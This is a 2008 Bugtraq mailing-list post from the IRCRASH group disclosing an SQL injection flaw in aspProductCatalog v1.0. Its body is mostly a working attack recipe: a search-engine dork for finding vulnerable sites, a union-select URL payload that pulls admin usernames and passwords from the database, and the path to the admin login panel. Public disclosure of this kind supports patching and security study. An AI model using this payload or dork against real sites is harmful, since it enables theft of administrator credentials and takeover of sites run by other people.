Bugtraq mailing list archives

aspProductCatalog Sql Injection


From: r3d.w0rm () yahoo com
Date: 11 Dec 2008 06:21:42 -0000

#####################################################################################
####                     aspProductCatalog Sql Injection                         ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
#####################################################################################
#                                                                                   #
#Download : http://heanet.dl.sourceforge.net/sourceforge/aspprocatalog/aspProductCatalogv1.0.zip
#                                                                                   #
#DORK : "Powered by ASP Product Catalog" inurl:default.asp                          #
#                                                                                   #
#####################################################################################
#                                 [Sql Injection]                                   #
#                                                                                   #
#http://Site/default.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin  #
#                                                                                   #
#####################################################################################
#                                  [Admin Panel]                                    #
#                                                                                   #
#http://Site/admin/login.asp                                                        #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################


Current thread: